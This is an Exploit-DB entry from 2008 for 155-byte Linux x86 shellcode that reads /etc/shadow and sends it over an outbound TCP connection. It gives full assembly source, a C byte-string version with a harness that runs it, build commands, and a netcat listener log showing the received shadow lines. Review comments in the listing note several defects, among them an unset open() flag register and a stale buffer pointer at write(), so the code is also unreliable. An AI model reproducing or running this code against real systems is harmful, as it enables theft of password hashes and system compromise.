linux/x86 - connect back.send.exit /etc/shadow 155 bytes

2008-08-18T00:00:00
ID EDB-ID:13339
Type exploitdb
Reporter 0in
Modified 2008-08-18T00:00:00

Description

Linux/x86 shellcode, 155 bytes: reads /etc/shadow, connects back to a listener, sends the file contents and exits.

                                        
                                            ;                           (C)oDed by 0in
;                   Dark-Coders Group Productions
;        [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
;   >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
;               Contact: 0in[dot]email[at]gmail[dot]com
;           Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
;       nasm -f elf shellcode.asm
;       ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::

;The code (Assembler version):

Section .text
    global _start

; ----------------------------------------------------------------------
; _start - read /etc/shadow and send it over an outbound TCP connection.
;
; Syntax/ABI: NASM (Intel operand order), 32-bit Linux, int 0x80 system
;             calls: eax = syscall number, ebx/ecx/edx = arguments.
; Sequence:   open("/etc/shadow") -> read(fd, stack, 1222)
;             -> socketcall(SYS_SOCKET) -> socketcall(SYS_CONNECT) to
;             0.0.0.0, TCP port 8192 -> write(sock, stack, 1222)
;             -> exit(1).
;             This is also the order the calls appear in a syscall audit
;             trail or an EDR process timeline.
; Privilege:  the author's demo runs the binary from a root shell.
; Encoding:   constants are loaded with 16-bit moves and add/sub pairs,
;             apparently to keep 0x00 bytes out of the encoding (see the
;             author's note at the port constant). Only the low halves
;             of eax/ebx/edx are written in those places; the upper
;             halves are assumed to be zero already.
; Errors:     no syscall return value is checked.
; ----------------------------------------------------------------------
_start:
        ; open(file, flags): builds the path on the stack, last bytes first
        xor ebx,ebx
        push byte 0x77 ; "w"; pushed as a sign-extended dword, so the three 0x00 bytes after it terminate the string
        push word 0x6f64 ; "do"
        push 0x6168732f ; "/sha"
        push 0x6374652f; "/etc" -> esp now points at "/etc/shadow",0
        mov ebx,esp ; first arg - filename
        xor ax,ax
        inc ax
        inc ax
        inc ax
        inc ax
        inc ax ; ax = 5: the open syscall number (O_RDONLY itself is 0 and belongs in ecx)
        ; NOTE(review): ecx (the flags argument) is not written before this
        ; call; it keeps whatever value it had at entry.
        int 0x80
        mov ebx,eax ; ebx = return value of open (the fd on success)
        ;read(file,buff,1222):
        xor ax,ax
        inc ax
        inc ax
        inc ax ; syscall id = 3
        mov dx,1222 ; size to read
        push esp
        ; ecx = the esp value just pushed, i.e. the address of the path string:
        ; the read lands on top of the path and the stack above it.
        mov ecx,[esp] ; memory
        int 0x80
        mov esi,eax ; esi = return value of read (byte count or negative errno), not a pointer
        ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP)
        xor ebx,ebx
        push ebx ;0 ; 3rd arg (protocol)
        inc ebx
        push ebx ;1 ; 2nd arg (SOCK_STREAM)
        inc ebx
        push ebx ;2 ; 1st arg (PF_INET)
                    ;socketcall()
        mov ax,1666 ; 1666 - 1564 = 102,
        sub ax,1564 ; the socketcall syscall number
        xor bx,bx   ; socket() call id
        inc bx      ; bx = 1 (SYS_SOCKET)
        mov ecx,esp ; ecx -> the three arguments pushed above
        int 0x80    ; returns the socket fd in eax
        pop ebx; drops one dword (the value 2) from the argument array
        ;connect(eax,struct server,16)
                  ;16 - sizeof struct sockaddr
        mov edx, eax ; edx = return value of socket()
        xor ebx,ebx
        ; Duplicate of the previous instruction; the C byte string further
        ; down encodes only one xor here.
        xor ebx,ebx  ; ebx = 0 - IP=0.0.0.0 (author's placeholder for the receiver's address)
        push ebx ; sin_addr
        mov bx,1666 ; definition of struct sockaddr
        sub bx,1634 ; bx = 32 = 0x0020; stored little-endian it reads as 0x2000 = 8192 in network byte order (the author avoids a 0x00 in the immediate)
        push bx ; sin_port
        mov al, 2 ; al = 2 (AF_INET); ah is left as returned by socket()
        push ax ; sin_family
        mov ecx, esp ; ecx -> the 8 sockaddr bytes built above
        mov al, 16 ; addrlen; only al is written
        push eax ; 3rd connect arg: addrlen
        push ecx ; 2nd connect arg: sockaddr pointer
        push edx ; 1st connect arg: socket fd
        mov al, 102 ; socketcall
        mov bx,1666
        sub bx,1663 ; bx = 3 (SYS_CONNECT)
        mov ecx, esp ; ecx -> {fd, &sockaddr, 16}
        int 0x80 ; call connect
        mov ebx,eax ; ebx = return value of connect (replaced by the pop below)
        ; Send the buffer to the remote end, then terminate.
        ;write(socket,file,1222)
        pop ebx ; ebx = the socket fd pushed as the first connect argument
        mov ax,1666
        sub ax,1662 ; ax = 4 (write); the upper half of eax still holds connect's result
        push esi ; pushes the read() result; it is not passed as a syscall argument
        mov dx,16666
        sub dx,15444 ; dx = 1222 (length)
        ; NOTE(review): ecx is not reloaded here, so the buffer pointer is the
        ; esp value captured before connect, not the address given to read();
        ; the bytes sent therefore start with stack contents that lie below
        ; the read buffer.
        int 0x80
        ;exit(1) :
        xor eax,eax ; eax = 0
        inc eax ; eax = 1 (exit)
        mov ebx,eax ; exit status = 1
        int 0x80    ; terminate the process
; C version (the shellcode as a byte string, with a test harness):
;   #include <stdio.h>
;   char shellcode[]="\x31\xdb"
;   "\x6a\x77"
;   "\x66\x68\x64\x6f"
;   "\x68\x2f\x73\x68\x61"
;   "\x68\x2f\x65\x74\x63"
;   "\x89\xe3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\xba\xc6\x04"
;   "\x54"
;   "\x8b\x0c\x24"
;   "\xcd\x80"
;   "\x89\xc6"
;   "\x31\xdb"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x1c\x06"
;   "\x66\x31\xdb"
;   "\x66\x43"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x5b"
;   "\x89\xc2"
;   "\x31\xdb"
;   "\x53"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x62\x06"
;   "\x66\x53"
;   "\xb0\x02"
;   "\x66\x50"
;   "\x89\xe1"
;   "\xb0\x10"
;   "\x50"
;   "\x51"
;   "\x52"
;   "\xb0\x66"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x7f\x06"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x5b"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x7e\x06"
;   "\x56"
;   "\x66\xba\x1a\x41"
;   "\x66\x81\xea\x54\x3c"
;   "\xcd\x80"
;   "\x31\xc0"
;   "\x40"
;   "\x89\xc3"
;   "\xcd\x80";
;   int main(int argc, char **argv)
;    {
;	    int *ret;
;	    ret = (int *)&ret + 2;
;	    (*ret) = (int) shellcode;
;    }

; milw0rm.com [2008-08-18]